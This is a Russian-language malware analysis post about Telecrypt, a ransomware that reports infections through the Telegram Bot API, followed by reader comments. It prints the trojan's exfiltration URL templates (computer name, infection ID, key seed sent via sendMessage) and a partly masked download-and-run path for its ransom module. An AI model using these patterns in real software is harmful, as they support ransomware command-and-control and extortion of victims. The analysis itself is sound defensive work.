Описание вредоносного ПО

Первый шифровальщик, использующий Telegram

В общем случае шифровальщики можно разделить на две группы:

  1. Шифровальщики, которые поддерживают офлайн-шифрование
  2. Шифровальщики, которые не поддерживают офлайн-шифрование

Необходимость использования интернета для шифрования файлов пользователя обусловлена несколькими причинами. Например, злоумышленники могут отправлять шифровальщику ключ для шифрования и получать от него информацию для последующей расшифровки файлов жертвы.

Очевидно, что для получения данных от зловреда на стороне вирусописателя необходим специальный сервис. Данный сервис должен быть защищен от сторонних исследователей, что требует от злоумышленников дополнительных затрат на его разработку.

В этом месяце мы обнаружили нацеленный на российских пользователей шифровальщик, одна из особенностей которого – использование протокола мессенджера Telegram для отправки злоумышленнику ключа для расшифровки.

Это первый известный нам случай использования протокола Telegram шифровальщиками.

Анализ файла

Троянец написан на Delphi и имеет размер более 3Мб. После запуска зловред генерирует ключ для шифрования файлов и идентификатор заражения infection_id.

Далее он связывается со злоумышленниками с помощью публично доступного Telegram Bot API. То есть, по сути, троянец выполняет функции бота Telegram и посредством публичного API отправляет сообщения своим создателям.

Для этого злоумышленники заранее создали «бот Telegram». Они получили от серверов Telegram уникальный токен, который однозначно идентифицирует вновь созданного бота, и поместили его в тело троянца, чтобы он мог использовать API Telegram.

Сначала троянец отправляет запрос на адрес https://api.telegram.org/bot<token>/GetMe, где <token> – это уникальный идентификатор Telegram-бота, созданного злоумышленниками. Согласно официальной документации API, метод getMe позволяет проверить, существует ли бот с заданным токеном, и получить о нем базовую информацию. Троянец никак не использует возвращаемую сервером информацию о боте.

Следующий запрос троянец отправляет, используя метод sendMessage, позволяющий боту посылать сообщения в чат с заданным номером. Зловред использует зашитый в его теле номер чата и рапортует своим создателям о факте заражения:

https://api.telegram.org/bot<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>

Параметры, передаваемые троянцем:

<chat> — номер чата со злоумышленником;

<computer_name> — имя зараженного компьютера;

<infection_id> — идентификатор заражения;

<key_seed> — число, на основе которого был сгенерирован ключ для шифрования файлов.

Когда информация отправлена, зловред ищет на дисках файлы заданных расширений и побайтово шифрует их простейшим алгоритмом сложения с байтами ключа.

telegram_rans_ru_1

Расширения файлов для шифрования

В зависимости от настройки, троянец может добавлять зашифрованным файлам расширение «.Xcri» либо вообще не менять расширение. Найденный нами образец троянца расширение не меняет. Список зашифрованных файлов сохраняется в текстовом файле %USERPROFILE%\Desktop\База зашифр файлов.txt.

После шифрования троянец отправляет запрос https://api.telegram.org/bot<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>stop

Все параметры аналогичны предыдущему запросу, но в конце добавлено слово «stop».

Затем зловред скачивает со скомпрометированного сайта на WordPress дополнительный модуль Xhelp.exe (ссылка http://***.ru/wp-includes/random_compat/Xhelp.exe) и запускает его. Этот модуль – злоумышленники называют его «Информатор» – имеет графический интерфейс и сообщает жертве о произошедшем, а также выдвигает требования выкупа. Сумма составляет 5000 руб, а в качестве методов оплаты предлагаются Qiwi и Яндекс.Деньги.

Первый шифровальщик, использующий Telegram

telegram_rans_ru_3

telegram_rans_ru_4

Сообщения, которые видит жертва злоумышленников

Связь жертвы со злоумышленниками осуществляется через поле ввода в интерфейсе «Информатора». Реализована эта функциональность также через отправку Telegram-сообщения с помощью метода sendMessage.

Обилие грамматических ошибок в тексте требований заставляет задуматься об уровне образования авторов троянца. Также привлекает внимание заявление «Спасибо что помогаете фонду юных программистов.»

Заключение

Все продукты «Лаборатории Касперского» детектируют данную угрозу со следующими вердиктами:

Trojan-Ransom.Win32.Telecrypt
PDM:Trojan.Win32.Generic

MD5:

3e24d064025ec20d6a8e8bae1d19ecdb — Trojan-Ransom.Win32.Telecrypt.a (основной модуль)
14d4bc13a12f8243383756de92529d6d — Trojan-Ransom.Win32.Telecrypt.a (модуль-информатор)

Если вы стали жертвой данного шифровальщика, убедительная просьба – не платите злоумышленникам! Обратитесь в нашу службу поддержки, и мы поможем расшифровать ваши файлы.

Первый шифровальщик, использующий Telegram

Ваш e-mail не будет опубликован. Обязательные поля помечены *

 

  1. А.

    Что за низкое поведение. Вы даже не информировали официальные службы Телеграм о данном боте, чтобы он был заблокирован, и пиаритесь, рекламируя метод, вместо реальной защиты людей! Хотя бы сейчас исправьтесь.

  2. Антон

    Здравствуйте.
    Данный шифровальщик не производит обработки ошибок при работе с ботом и в любом случае производит шифрование файлов. Из этого следует, что «блокировка» бота не поможет потенциальным жертвам.

  3. Никита

    KES 10 грохнул Telegramm , только что установленный. нашел что-то в Temp, и сказал «надо лечить с перезагрузкой»
    Вопрос: он меня спас или это превентивные меры?

  4. mike_1

    А теневые копии это чудо инженерной мысли удаляет?

  5. Aleks

    ну а методы его попадания на комп? название exe файла?

  6. Эдвин

    Здравствуйте! Звучит красиво и гипнотизирующе! Вопрос: каковы меры профилактики? Не запускать данный чат? Самое главное оставили за кадром.

  7. Николай

    Здравствуйте.
    Если не взаимодействовать с ботами, то вирусный файл на пк не попадет?

  8. Sly_tom_cat

    » зловред ищет на дисках файлы заданных расширений и побайтово шифрует их простейшим алгоритмом сложения с байтами ключа.»
    Это же в любом курсе криптографии приводится как пример неправильной реализации OTP шифрования.
    Ключ можно определить по известным заголовкам файлов на основе пары десятков файлов.

    Точно — школота баловалась.

  9. Zental

    Пути заражения какие? Как передается?

  10. DIMON KRASNODAR

    здравствуйте.
    Мне пришло письмо на электронку от якобы Ростелекома.Какой-то счет. Хотя я с ростелекомом никаким боком не сталкивался интерес взял верх или усталость ,но открыл пошла закачка архива вроде, пытался выключить бесполезно. ВСЕ файлы на ВСЕХ дисках зашифрованы.Сообщение на красном фоне-плати бабло типа. А вот ———
    Кто говорит лечится кто нет.ВСЕ снес. Да еще при удалении файлов удалялись все а один в мои документы-нет,пишет типа системный и название какое-то странное ТРОЯ или как то так. Зналбы кто уши надрал.____ ______

  11. Konstantin

    Неужели еще есть люди, которые используют винду для работы и хранят там важные файлы? Мало того что мерзкий интерфейс, так еще и вирусни выше крыши. Работать на винде — это как ездить на маршрутках типа газель. Люди уважайте себя, купите нормальную технику.

    1. Квант

      Дай денег плиз, на нормальную технику.

Отчеты

CloudSorcerer: новая APT-угроза, нацеленная на российские государственные организации

«Лаборатория Касперского» обнаружила новую APT-угрозу CloudSorcerer, нацеленную на российские государственные организации и использующую облачные службы в качестве командных серверов аналогично APT CloudWizard.

StripedFly: двуликий и незаметный

Разбираем фреймворк StripedFly для целевых атак, использовавший собственную версию эксплойта EternalBlue и успешно прикрывавшийся майнером.

Подпишитесь на еженедельную рассылку

Самая актуальная аналитика – в вашем почтовом ящике